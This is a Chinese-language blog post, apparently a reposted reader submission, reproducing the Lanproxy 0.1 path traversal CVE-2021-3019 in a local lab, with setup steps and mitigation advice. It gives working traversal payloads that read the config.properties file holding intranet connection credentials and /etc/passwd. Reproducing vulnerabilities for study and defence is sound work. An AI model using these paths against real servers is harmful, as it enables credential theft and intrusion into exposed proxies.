首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >Lanproxy 任意文件读取漏洞 (CVE-2021-3019)漏洞利用

Lanproxy 任意文件读取漏洞 (CVE-2021-3019)漏洞利用

作者头像
释然IT杂谈
发布2022-10-27 17:20:49
发布2022-10-27 17:20:49
9070
举报
文章被收录于专栏:释然IT杂谈释然IT杂谈

本文由粉丝:判官蜘蛛投稿

漏洞概述:

Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

影响版本:

代码语言:javascript
复制
lanproxy 0.1

环境搭建:

1.下载proxy-server-0.1.zip

下载地址:

代码语言:javascript
复制
https://file.nioee.com/d/2e81550ebdbd416c933f/

2. 解压安装之后移动文件

代码语言:javascript
复制
mv proxy-server-0.1 /usr/local/

直接启动服务

代码语言:javascript
复制
cd /usr/local/proxy-server-0.1/bin
chmod +x startup.sh
./startup.sh

3. 访问 http:///ip:8090 登录界面窗口

4.漏洞利用

Poc

代码语言:javascript
复制
/../conf/config.properties

5.读取passwd

代码语言:javascript
复制
/../../../../../../../../../etc/passwd

成功读取

6、修复建议

lanproxy尚未针对该漏洞发布安全更新

建议禁止将lanproxy管理面板对外部开放

结束语:

本次复现是本地搭建模拟攻击行为,本文章仅用于交流学习,请勿使用该漏洞进行违法活动。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-01-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 释然IT杂谈 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档